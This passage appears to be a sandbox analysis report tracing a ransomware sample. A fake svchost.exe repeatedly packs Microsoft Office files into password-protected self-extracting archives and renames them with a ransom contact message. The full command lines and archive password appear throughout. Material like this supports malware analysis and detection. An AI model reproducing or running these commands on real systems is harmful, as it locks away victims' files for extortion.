  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHPHN.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHPHN.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2440
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3064
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1608
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3032
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2292
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1568
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2840
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2588
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2128
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1208
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1384
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2120
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1248
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2472
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2952
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:448
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1220
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2556
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1472
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:1732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2088
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2148
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2364
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1608
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2508
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2740
- C:\ProgramData\msvkp\svchost.exe
